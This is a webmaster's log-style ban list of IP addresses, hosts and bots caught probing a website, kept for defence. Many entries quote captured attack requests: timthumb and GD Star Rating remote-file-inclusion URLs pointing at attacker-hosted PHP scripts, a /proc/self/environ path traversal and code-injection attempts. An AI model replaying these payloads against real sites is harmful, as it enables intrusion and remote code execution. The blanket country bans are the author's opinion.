Company: Hungary – Budapest Hungarian Telecom
Bad event – looking for plugin script. No referrer, no other URL accessed:
/wp-content/plugins/reflex-gallery/scripts/galleryManager.js
204.93.60.219 Company: United States – Torrance Giglinx Inc. Javascript Injection attack
123.151.148.200 Company: China – Beijing Haoweigaoke Ltd Unwanted bot:
Sosospider+(+http: //help.soso.com/webspider.htm)
194.135.105.55 Hostname: a55.nthosting.ru
Company: Russian Federation – Moscow Ooo Npo Relcom
Comment Spammer
209.250.3.186 Hostname: 209-250-3-186.convergentaz.net
Company: United States – Phoenix Convergent Internet Solutions
Trying to login/register on restricted site
/?q=user/register
211.115.89.131 Company: Korea, Republic Of – Seoul Gabia Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
198.144.116.15 Company: United States – Torrance Giglinx Inc. Comment Spammer
Javascript injection attack
Blocked by Firewall – subsequently banned
63.141.199.20 Company: United States – Torrance Giglinx Inc. Malicious User Agent: Java/1.7.0_09
Blocked by Firewall – subsequently banned
112.215.36.183 Company: Indonesia – Jakarta Pt Excelcomindo Pratama Script/injection attack:
/wp-content/uploads/2012/12/ads.xl.co.id/hp/ads.xl.co.id/hp/403.php
217.64.195.223 Hostname: w-03.th.seeweb.it
Company: Italy – Frosinone Seeweb S.r.l.
Timthumb exploiter
/wp-content/plugins/cms-pack/timthumb.php?src=http:
//picasa.com.oxybeauty.com/module.php
Blocked by .htaccess – subsequently banned
24.173.94.227 Hostname: 227.94.173.24.gvodatacenter.com
Company: United States – Plano Road Runner Holdco Llc
Banned User agents:
Mozilla/5.0 (compatible; AhrefsBot/3.1; +http: //ahrefs.com/robot/)
Mozilla/5.0 (compatible; Baiduspider/2.0; +http: //www.baidu.com/search/spider.html)
Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Also – NO USER AGENT
81.21.243.46 Hostname: 81-21-243-46.televork.ee
Company: Estonia – Tallinn Televorgu As
Looking for registration interfaces:
/author/george74@engineeringheadquarters.com
/author-panel
/submit-articles
/wp-login.php
93.91.195.203 Company: Iraq Erbil Newroz Telecom Ltd. Mail Server / Spammer
Looking for .txt files
63.141.199.187 Company: United States – Torrance Giglinx Inc. Malicious User Agent: Java/1.7.0_09
93.190.218.42 Company: Turkey – Bursa Rekare Bilgi Teknolojileri Ticaret Ve Sanayi Limited Sirketi Attempted WordPress GD Star Ratings plugin exploit:
//wp-content/gd-star-rating/?src=http%3A%2F%2Fwordpress.com.viawireless.
visaonet.com.br/onet.php
61.55.141.10 Company: China – Shijiazhuang China Unicom Hebei Province Network Comment Spammer:
Found Honeypot trap
64.121.4.75 Hostname: mail1.infradapt.com
Company: United States – Philadelphia Rcn Corporation
Mail Server / Dictionary Attacker
Crawled all plugin folders looking for .js and CSS files
BANNED
184.154.25.218 Hostname: mail.theinvestorrolodex.com
Company: United States – Chicago Singlehop Inc.
Malicious User Agent: libwww-perl/6.04
Chicago Singlehop again
61.147.82.178 Company: China – Nanjing Chinanet Jiangsu Province Network Comment Spammer
219.76.104.18 Hostname: yvcf04.netvigator.com
Company: Hong Kong – Hong Kong Pccw Limited
Comment Spammer
194.71.224.227 Company: Sweden – Stockholm Iehavoc Ab Trying to login/register on restricted site
/?q=user/register
208.177.72.206 Hostname: 208.177.72.206.ptr.us.xo.net
Company: United States – Herndon Xo Communications
Comment Spammer
195.19.204.151 Hostname: spios.nw.ru
Company: Russian Federation – Saint Petersburg Rokson Vo-router’s Network
File inclusion attempt – Blocked by Firewall
//plugins/filemanager/classes/CorePlugin.php
//eskipazari.com/bad.txt?
//eskipazari.com/images/products/large/ec.txt???
91.230.211.48 Company: Russian Federation – Krasnoyarsk Optizon Ltd. Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/wponlinestore-review/admin/categories.php/login.php?cPath=&action=new_product_preview
190.14.48.105 Hostname: host-190-14-48-105.iia.cl
Company: Chile – Santiago Ingenieria E Informatica Asociada Ltda
Trying to login/register on restricted site
/?q=user/register
193.243.171.237 Company: Serbia – Belgrade Localhost D.o.o. Spam Harvester
Trying to login/register on restricted site
/?q=user/register
198.98.119.247 Hostname: 247.119-98-198.rdns.scalabledns.com
Company: United States – Henderson Enzu Inc
Attempting uploadify exploit
/files/uploadify/uploadify.php?
No User Agent or referrer
94.55.246.156 Company: Turkey Ankara Turksat Uydu Haberlesme Ve Kablo Tv Isletme A.s. Brute Force login attempt on WordPress
192.169.58.93 Hostname: tradingk.arvixevps.com
Company: United States – Santa Rosa Arvixe Llc
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
195.70.48.68 see next Hostname: tradingk.arvixevps.com
Company: Hungary – Debrecen Gts Hungary Tavkozlesi Ktf.
Attempted WordPress GD Star Ratings plugin exploit
//wp-content/gd-star-rating/?src=http: //blogger.com.indograndhosting.web.id/mini.php
67.19.64.18 Hostname: 12.40.1343.static.theplanet.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
192.210.50.60 Hostname: host.aerostarrinnovations.com
Company: United States – Walnut Psychz Networks
Dictionary Attacker / Comment Spammer
Trying to access directories
31.24.40.128 Hostname: naire.hospedando.com
Company: Spain – Alicante Access Basic Server S.l.
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
77.222.61.141 Hostname: vh25.sweb.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd.
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
15.193.49.4 Company: United States – Palo Alto Hewlett-packard Company Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
88.224.18.30 Hostname: 88.224.18.30.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Mail Server / Dictionary Attacker
Trying to login to WordPress
/wp-login.php
88.224.18.30 Hostname: 88.230.9.3.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Mail Server
Trying to login to WordPress
/wp-login.php
209.190.8.58 Hostname: s3.sdnt.net
Company: United States – Columbus Xlhost.com Inc
Showing either user agent:
SEOstats 2.0.9 https: //github.com/eyecatchup/SEOstats
or NO USER A: google.com
BANNED
213.251.135.16 Hostname: interstice.fr
Company: France Paris Ovh Sas
Attempting wpOnlineStore plugin / osCommerce exploit.
//admin/file_manager.php/login.php
218.108.169.108 Company: China – Hangzhou Wasu Bb Comment Spammer
found Honeypot Trap
192.74.240.97 Company: United States – Sunnyvale Peg Tech Inc Comment Spammer
174.120.161.34 Hostname: 22.a1.78ae.static.theplanet.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Script attack
/file.php?file[]=../../../../../../../../../../../../../../../proc/self
/environ%00/security/file.php?file[]=../../../../../../../../../../../
../../../../proc/self/environ%00
24.37.37.26 Hostname: modemcable026.37-37-24.static.videotron.ca
Company: Canada – Longueuil Videotron Ltee
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/categories.php/login.php?cPath=&action=new_product_preview
/admin/file_manager.php/login.php
[URL]/images/m32.php
93.182.139.88 Hostname: anon-139-88.vpn.ipredator.se
Company: Sweden – Lund Viaeuropa I Lund Ab
Trying to login/register on restricted site
/?q=user/register
65.52.0.0/14 MSNBOT
Company: United States – New York City Microsoft Corp
Rule Breaker – ignores robots.txt
excessive crawling, multiple simultaneous bots on site
208.89.210.244 Company: United States – Kansas City Dnsslave.com Spammer
Trying to register on restricted site: /?q=user/register
No referrer
199.101.102.27 Company: United States – Cincinnati Armada Media Llc Spammer
Trying to register on restricted site: /?q=user/register
No referrer
8.18.120.32 Company: United States – Omaha Level 3 Communications Inc. Tried to register on restricted site
/?q=user/register
23.19.72.231 Company: United States – Phoenix Nobis Technology Group Phoenix Comment Spammer
204.93.60.104 Company: United States – Torrance Giglinx Inc. Comment Spammer
210.129.193.152 Hostname: 210-129-193-152.jp-east-t1v.noahcloud.jp
Company: Japan – Tokyo Idc Frontier Inc.
Comment Spammer.
/wp-comments-post.php
No referrer – direct access attempt.
82.232.4.8 Hostname: cal69-1-82-232-4-8.fbx.proxad.net
Company: France – Paris Free Sas
Comment Spammer.
/wp-comments-post.php
No referrer – direct access attempt. Multiple attempts
82.59.142.38 Hostname: host38-142-dynamic.59-82-r.retail.telecomitalia.it
Company: Italy Roma Telecom Italia Net
Image Hotlinker
124.207.123.38 Company: China – Beijing Beijing Time-vision Telecommunication Dictionary Attacker
Suspected content scraper / feed embedder:
[URL]/?utm_source=rss&
80.247.161.74 Hostname: da04.easyhosting.nl
Company: Netherlands Winschoten Denit Internet Services
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
50.63.188.145 Hostname: ip-50-63-188-145.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
163.125.245.58 Company: China – Guangzhou China Unicom Guangdong Province Network Attempted to force register and login:
[URL]/index.php?app=core&module=global&section=login
/ucp.php?mode=register
/index.php?page=en_Signup
/?do=/user/register/
/join_form.php
108.62.215.194 Hostname: 108.62.215.194.rdns.ubiquityservers.com
Company: United States Dallas Nobis Technology Group Llc
Comment Spammer
142.91.200.114 Hostname: 142.91.200.114.rdns.ubiquity.io
Company: United States Dallas Ubiquity Server Solutions Dallas
Trying to register on restricted site
74.221.220.31 Company: United States – Seattle Dme Hosting Llc Comment Spammer
Trying to register on restricted site
72.249.45.127 Hostname: server1.ratethatbrand.com
Company: United States – Saint Louis Colo4 Llc
UA: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
64.50.177.50 Hostname: f5.lunarvine.com
Company: United States – Washington Lunar Pages
Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
23.19.171.46 Hostname: 23.19.171.46.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Trying to register on restricted site
No referrer
216.152.252.51 Hostname: unknown.xeex.net
Company: United States – Santa Monica Xeex
Comment Spammer
Trying to register on restricted site
No referrer
174.136.32.3 Hostname: sierra.unisonplatform.com
Company: United States – Houston 180servers.com
Attempted timthumb exploit:
//wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php
61.183.248.222 Company: China – Beijing Chinanet Network In Wuhan City Hubei Province Comment Spammer:
107.6.134.130 Hostname: server.robosite.com
Company: United States Chicago Singlehop Inc.
Comment Spammer:
209.197.12.104 Company: United States – Layton Newshosting Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
200.160.238.201 Company: Brazil – Sao Paulo Brasil Telecom S/a – Filial Distrito Federal Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
15.217.50.4 Hostname: v31687.1blu.de
Company: Germany Berlin 1blu Web Hosting Frankfurt
Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
88.84.151.187 Company: United States – Palo Alto Hewlett-packard Company Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
202.98.198.100 Company: China – Guiyang Chinanet Guizhou Province Network Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
41.35.157.73 Hostname: host-41.35.157.73.tedata.net
Company: Egypt – Al Jizah Te Data
Trying to login to restricted site
/wp-login.php
198.27.78.140 Company: United States – Newark Ovh Comment Spammer
Found Honeypot Trap file
93.182.174.161 Hostname: anon-174-161.vpn.ipredator.se
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer / Trackback Spammer
203.41.243.240 Company: Australia – Canberra Telstra Internet Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
87.253.162.9 Hostname: server9.configcenter.info
Company: Germany – Ahrensburg Media:webline Internet Solutions Gmbh
Attempting osCommerce/ZenCart exploit.
/admin/categories.php/login.php?cPath=&action=new_product_preview
121.33.4.174 Company: China – Guangzhou Chinanet Guangdong Province Network Spidering site – mainly looking for RSS feeds and forms.
Never read robots.txt
No referrer
151.21.68.169 Hostname: ppp-169-68.21-151.libero.it
Company: Italy – Milano Wind Telecomunicazioni S.p.a
Mail Server / Comment Spammer
198.154.62.175 Company: United States – Miami Fortatrust Usa Corporation Attempting WordPress GD Star Rating plugin exploit:
http: //wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
/!tum?src=http: //blogger.com.nilgirisrealty.com/link.php
184.168.152.193 Hostname: p3nlhftpg091.shr.prod.phx3.secureserver.net
Company: United States – Fort Worth Godaddy.com Llc
Attempted timthumb exploit:
/wp-content/plugins/christmas/timthumb/timthumb.php?src=http%3A%2F%2Fflickr.com.deliz.co.uk%2Fbad.php
103.21.208.46 Company: China – Kaifeng Kaifeng Guochao E-commerce Co.ltd. Comment Spammer
Found Honeypot Trap file
23.19.171.115 Hostname: 23.19.171.115.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Trying to login/register on restricted site
/?q=user/register
67.202.122.68 Hostname: ip68.67-202-122.static.steadfastdns.net
Company: United States – Chicago Steadfast Networks
Trying to login/register on restricted site
/?q=user/register
23.19.72.8 Company: United States – Phoenix Nobis Technology Group Phoenix Trying to login/register on restricted site
/?q=user/register
121.62.159.224 Company: China – Wuhan Chinanet Hubei Province Network Trying to login/register on restricted site
/?q=user/register
173.199.115.35 Hostname: 173.199.115.35.choopa.net
Company: United States – Piscataway Ahrefs Inc.
UA: Mozilla/5.0 (compatible; AhrefsBot/4.0; +http: //ahrefs.com/robot/)
AHREFS Bot
74.221.215.118 Company: United States – Seattle Dme Hosting Llc Trying to login/register on restricted site
/?q=user/register
93.182.169.172 Hostname: anon-169-172.vpn.ipredator.se
Company: Sweden – Jamshog Viaeuropa I Lund Ab
Comment Spammer:
Trying to login/register on restricted site
/?q=user/register
93.182.139.81 Hostname: anon-139-83.vpn.ipredator.se
Company: Sweden – Jamshog Viaeuropa I Lund Ab
Trying to login/register on restricted site
/?q=user/register
199.47.209.146 Company: New York City Vegasnap Llc Trying to login/register on restricted site
/?q=user/register
91.240.8.66 Hostname: cpanel.netveillance.net
Company: Romania Cluj-napoca Sc Netveillance Srl
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
85.158.248.65 Hostname: srv11028.hostingserver.nl
Company: Netherlands – Zwolle It-ernity Internet Services Bv
Remote file inclusion attack
http: //myghost.myqr.sg/bbs/logs/bad.txt?
http: //admin/actions/del.php?include_path=http: //myghost.myqr.sg/bbs/logs/rabot.txt???
203.128.80.62 Hostname: ip-80-62.neuviz.net.id
Company: Indonesia – Denpasar Jl. Hayam Wuruk No.1 Rst
Spam Harvester / Mail Server
UA: Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
84.240.247.6 Company: Kazakhstan – Almaty Digital Tv Llp Rogue bot:
Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
84.22.143.113 Hostname: ekon.g-service.ru
Company: Russian Federation – Krasnoyarsk Company Skala Ltd
Rogue bot:
Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
195.218.225.178 Hostname: 178.225.218.195.static.sovintel.ru
Company: Russian Federation – Moscow Ojsc Vimpelcom
Rogue bot: Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
88.135.63.154 Company: Russian Federation – Smolensk Man Network Ltd Mail Server / Dictionary Attacker
Rogue bot:
Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
23.19.216.203 Company: United States Seattle Ubiquity Server Solutions Seattle Comment Spammer
72.52.248.227 Hostname: host.webimpakt.com
Company: United States – Little Rock Liquid Web Inc.
Attempting osCommerce/ZenCart exploit.
admin/categories.php/login.php
admin/file_manager.php/login.php
admin/banner_manager.php/login.php
36.248.124.192 Company: China – Beijing Fuzhou City Fujian Provincial Network Of Unicom Comment Spammer
173.203.189.67 Company: United States – San Antonio Rackspace Hosting Attempted timthumb exploit:
/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=http
%3A%2F%2Fflickr.com.sistegraphic.com%2Fbad.php
59.60.127.49 Hostname: 49.127.60.59.broad.pt.fj.dynamic.163data.com.cn
Company: China – Fuzhou Chinanet Fujian Province Network
Comment Spammer
50.87.63.70 Hostname: 50-87-63-70.unifiedlayer.com Attempted WordPress GD Star Rating plugin / timthumb exploit:
/wp-content/gd-star-rating/timthumb.php?src=http
%3A%2F%2Fflickr.com.deliz.co.uk%2Fbad.php
83.21.90.206 Hostname: eha206.neoplus.adsl.tpnet.pl
Company: Poland Warsaw Telekomunikacja Polska S.a.
Trying to access admin and register.
/admin.php
/wp-login.php?action=register
50.97.138.101 Hostname: swine.arvixe.com
Company: United States – Dallas Softlayer Technologies Inc.
Attempted timthumb exploit:
/wp-content/plugins/cms-pack/timthumb.php?src=http
%3A%2F%2Fflickr.com.deliz.co.uk%2Fbad.php
88.231.168.217 Hostname: 88.231.168.217.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Dictionary Attacker and Mail Server
Attempting to login to site. No Referrer
83.8.206.11 Hostname: abvi11.neoplus.adsl.tpnet.pl
Company: Poland Warsaw Telekomunikacja Polska S.a.
Mail Server
Trying to access site admin:
/wp-login.php?registration=disabled
/admin/
/choosepack.html
/add
83.8.199.132 Hostname: abvb132.neoplus.adsl.tpnet.pl
Company: Poland Warsaw Telekomunikacja Polska S.a.
Mail Server
Trying to access site admin:
/wp-login.php?registration=disabled
/admin/
/choosepack.html
/add
199.19.110.150 Company: United States – Scranton Leyton Reed Comment Spammer
108.171.248.27 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Comment Spammer
42.62.5.109 Company: China – Beijing Forest Eternal Communication Tech. Co.ltd Comment Spammer
Tried to login to site
107.6.134.130 Hostname: server.robosite.com
Company: United States Chicago Singlehop Inc.
Comment Spammer
209.249.53.149 User Agent: Mozilla/5.0 http: //fairshare.cc (X11; U; FreeBSD i386; en-US; rv:1.2a) Gecko/20021021 Suspicious spider – identified as guest not as bot
70.39.149.206 vps7404.inmotionhosting.com – UA: libwww-perl/6.04 Attempting wpOnlineStore plugin / osCommerce exploit.
212.90.148.29 w69.goneo.de Attempting wpOnlineStore plugin / osCommerce exploit.
69.142.162.67 c-69-142-162-67.hsd1.pa.comcast.net Spammer – Attempting to register user account – no login links, no user accounts on site
195.114.19.215 195-114-19-215.ispfr.net Attempting wpOnlineStore plugin / osCommerce exploit.
96.31.92.131 UA: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 Looking for timthumb exploit
91.236.74.254 UA: Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.64 Comment spammer – tries to access my honeypot trap file daily –
even though banned for over 6 months
91.121.144.127 Host: ns356994.ovh.net Registrar: France Roubaix Ovh Sas Ovh Hosting is banned – there’s nothing good coming from any of their IPs
209.225.111.190 Host: colo-dhcp-190.wi.net Attempting GD Star Ratings plugin exploit
unknown.scnet.net Bad Host – apparently used only by spambots and hacker bots – banned by hostname in .htaccess
189.1.174.0/24 Host: cloud.grupomegabr.com.br Registrar: Brazil Sao Paulo Hostlocation Ltda Attempting GD Star Ratings plugin exploit. Undesirable Country – BRAZIL – IP range banned
100.43.83.135 Host: spider-100-43-83-135.yandex.com UA: Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Hosting Company: United States Palo Alto Yandex Inc
Yandex – Russian Search engine – spider. Yandex bot is totally banned.
Rule breaker – ignores robots.txt completely.
Undesirable Country – RUSSIA
93.182.154.47 Host: anon-154-47.relakks.com Comment Spammer. daily attempts to spam even though has been banned since 03/2012.
213.55.107.59 Ethiopia – Addis Ababa Distributed Nat For Ngn Comment Spammer
129.121.186.120 Host: ip-129-121-186-120.local Brute force exploit attempt on GD Star Ratings plugin
199.30.94.114 Host: ispconf3.esonicspider.com UA: libwww-perl/5.805 Attempting timthumb exploit – returns often
207.44.149.66 Host: xeon.intonet-technology.co.uk
UA: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6
Attempting WordPress timthumb exploit
98.142.210.82 Host: atlanta.sceneserver.com
UA: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Attempting WordPress timthumb exploit
65.61.204.40 Host: hosting.innovationnetworks.com Attempting WordPress timthumb exploit
192.31.21.179 Host: integromedb-crawler.sdsc.edu Nuisance spider, rule breaker, no value.
120.34.84.9 UA: Opera/9.80 (Windows NT 6.1; WOW64; U; Edition Yx; ru) Presto/2.10.289 Version/12.00 Known comment spammer
116.120.96.132 Mail server.
UA: Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML,like Gecko)Safari/413
Attempted DDOS attack on site
39.47.186.112 mail server Banned for hotlinking
192.204.198.201 Blocked by security system for trying to access wp-login.php
82.98.144.53 Host: hl37.dinaserver.com Banned for suspected script attack
67.212.166.98 Host: ns1.hotspotreviewcamera.com Comment Spammer – caught by honeypot trap
91.121.138.13 Host: ks355785.kimsufi.com (Another bad France Roubaix Ovh Sas IP) Persistent timthumb script attacks – returns daily – Banned since June 2012
91.121.60.213 Host: 91-121-60-213.kimsufi.com
France Roubaix Ovh Sas
Trying to post to Drupal
/?q=user/&destination=node/add
69.64.46.108 Host: dragon896.startdedicated.com Banned for Hotlinking and plagiarism
69.28.149.29 Mail Server
Host: dagmar.corp.linkedin.com
UA: Java/1.6.0_27
Banned for suspicious activity.
91.212.74.5 Host: amber.bunthosting.ro
Full IP range 91.212.74.0 – 91.212.74.255
BANNED
Attempting “Is-human WordPress Plugin Remote Command Execution Vulnerability”
66.209.67.142 Las Vegas Macminicolo.net Llc Attempted WordPress GD Star Ratings exploit.
Attempted TimThumb Exploit
208.177.72.206 Host: 208.177.72.206.ptr.us.xo.net Comment Spammer
184.172.156.228 184.172.156.228-static.reverse.softlayer.com Provide DNS service for the attacks of wordpress.com.cicadex.com.
186.101.50.2 Host: host-186-101-50-2.telconet.net Comment spammer
50.63.157.213 Hostname: ip-50-63-157-213.ip.secureserver.net. GoDaddy Hosting Looking for server / PHP injection vulnerability exploit – http:
///?_SERVER[DOCUMENT_ROOT]
FAKE USER AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
213.232.0.82 Hostname: im01.ada.net.tr
This host is suspicious and will be monitored for other BAD IPs
Exploit attempt on WordPress GD Star Rating plugin e.g. http:
//wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
200.98.203.73 Hostname: 200-98-175-199.clouduol.com.br
Another BAD Brazil IP – Brazil Sao Paulo Universo Online S.a.
Attempting WordPress GD Star Rating exploit
http: //wp-content/gd-star-rating/?src=http:
//wordpress.com.cicadex.com/mct.php
5.9.125.26 User-Agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Hostname: 5-9-125-26.crawler.sistrix.net
Another Hetzner Online Ag BAD IP
Undesirable spider.
Rule Breaker, Possible Spybot
No Value – no traffic will ever come from this spider
83.45.100.76 Hostname: 76.Red-83-45-100.dynamicIP.rima-tde.net
UA: Java/1.6.0_23
Nuisance spider
199.195.214.37 Hosting Company: Chicago Fortatrust Usa Corporation (United States) Attempting WordPress timthumb exploit
/wp-content/plugins/cms-pack/timthumb.php.cache/6da88008e6ddc64bf769a895581f90ba.php
31.3.234.170 Hostname: h31-3-234-170.host.redstation.co.uk.
Redstation hosting is totally banned
Prolific Comment Spammer.
Attempting wp-signup.
110.82.161.68 see next Registrar: China Fuzhou Chinanet Fujian Province Network Comment Spammer
82.98.136.8 Host: hl38.dinaserver.com
Hosting Company: Spain – A Coruna Dinahosting S.l.
Attempting WordPress GD Star Ratings exploit:
//wp-content/gd-star-rating/?src=http: //img.youtube.com.alojandome.com/brot.php
213.186.127.9 see next Hostname: 213.186.127.9.utel.net.ua
UA: Mozilla/5.0 (compatible; AhrefsBot/3.0; +http: //ahrefs.com/robot/)
Spybot. Ahrefs BANNED on sight.
204.110.9.190 Banned for timthumb exploit attempts
wp-content/themes/LondonLive/thumb.php?src=http: //picasa.com.flexihostings.co.nz/index2.php
76.73.5.2 Hostname: server2.up4.net
UA: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Attempting timthumb exploit
//wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=http:
//blogger.com.arztree.com/idss.php
199.19.109.246 Hosting Company: United States Scranton Volumedrive Comment Spammer
196.14.75.106 Hosting Company: South Africa – Kempton Park Internet Solutions Mail server
Dictionary attacker
75.98.169.231 Hostname: 75.98.169.231.static.a2webhosting.com
Mail server
Attempting WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //flickr.com.colortemplates.in/bad.php
91.235.237.17 Hostname: app1.aduana.gov.py Hacker: Attempting code injection:
/page.php?url=http: //leonardfamilyvalues.com/Assets/t.gif?%0D?
31.25.177.11 Hosting Company: Spain Madrid Free Technologies Excom S.l. Attempted osCommerce/wpOnlineStore exploit:
/admin/banner_manager.php/login.php
184.82.92.86 Hostname: service.productservicestuv.com
United States Chandler Dme Hosting Llc
Banned for trying to login to WordPress
69.49.99.106 Hostname: web106c10.megawebservers.com
Company: United States – Great Lakes Internetnamesforbusiness.com
UA: libwww-perl/5.835
Brute Force attempt at osCommerce/wpOnlineStore/Zencart exploit:
/admin/file_manager.php/login.php
Looking for xmlrpc.xml
142.91.13.242 Hostname: 142.91.13.242.rdns.ubiquity.io Trackback Spammer
65.60.11.138 Hostname: node1.rampragefiref.org
Another Chicago Singlehop Inc. Bad IP
Comment Spammer:
Found Honeypot Trap file
184.154.12.138 Hostname: bu004.buyurl.net
Another Chicago Singlehop Inc. Bad IP
Comment Spammer. Attempted to create user account.
189.254.102.164 Hostname: customer-189-254-102-164-sta.uninet-ide.com.mx Attempting WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //photobucket.com.clasek.de/iam.php
173.242.124.59 Iran, Islamic Republic Of Tehran Volumedrive Tried to register account on restricted Drupal site
142.91.176.35 Hostname: 142.91.176.35.rdns.ubiquity.io
United States – Dallas Ubiquity Server Solutions Dallas
Tried to register account on restricted Drupal site
69.175.86.202 Hostname: node2.exceptthepage.org
Another Singlehop Bad IP
Tried to register user account on restricted Drupal site
194.247.30.126 Hostname: hosted-by.deziweb.com
Netherlands Meppel Deziweb
Hacker: Attempting WordPress timthumb exploit:
/wp-content/themes/overeasy/thumb.php?src=http: //wordpress.com.oinotropia.gr/dm.php
198.15.124.76 United States – Phoenix Secured Servers Llc Comment spammer
198.15.124.77 United States – Phoenix Secured Servers Llc Comment spammer
72.233.77.178 Hostname: 178.77.233.72.static.reverse.ltdomains.com
United States – Kansas City Layered Technologies Inc.
Attempting WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.copiinet.ro/wordpress.php
193.254.241.12 Hostname: wmge7c.artinuove.it
Italy Roma – Widestore S.r.l.
Attempting osCommerce/wpOnlineStore/Zencart exploit:
/admin/file_manager.php/login.php
93.182.157.17 Hostname: anon-157-17.relakks.com Comment Spammer
93.182.130.179 Hostname: anon-130-179.relakks.com Comment Spammer
87.205.0.169 Hostname: 87-205-0-169.ip.netia.com.pl
Hosting Company: Poland – Netia Sa
Attempting WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http:
//picasa.com.smpunggulanalfalahpanji.sch.id/id/injekan.php
91.236.74.16 Ukraine – Hurzuf Przedsiebiorstwo Uslug Specjalistycznych Elan Mgr Inz. Andrzej Niechcial Trying to register on Drupal site
101.0.0.0 – 101.255.255.255 Undesirable country – CHINA
142.4.201.65 Hostname: 142.4.201.65.mohitseo.com
Hosting Company: United States – Dallas Ovh
Comment Spammer
Fake e-mail example: imxkmhcl@gmail.com
Name example: “Ways To Lose Stomach Fat”
99.192.1.18 Hostname: fctnnbsc30w-099192001018.dhcp-dynamic.FibreOp.nb.bellaliant.net
Hosting Company: Canada – Sydney Bell Aliant/dsl-hsi
Attempting server config hack:
sftp-config.json
109.124.98.250 Russian Federation – Megafiltr Attempted to access administrator.php
82.168.50.134 Hostname: 82-168-50-134.ip.telfort.nl Spam Harvester
212.38.177.109 Spam Harvester
216.189.163.160 Spam Harvester
74.125.182.47 Hostname: ia-in-f47.1e100.net Comment Spammer
208.80.164.4t User Agent: Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
Hosting Company: United States – Lake Charles Cameron Telephone
Hackerbot – attempts WordPress exploit
//wp-content/themes/TheStyle/timthumb.php?src=http:
//wordpress.com.aquasulisco.com/thumb.php
91.142.220.113 Hostname: cmastic.vservers.es
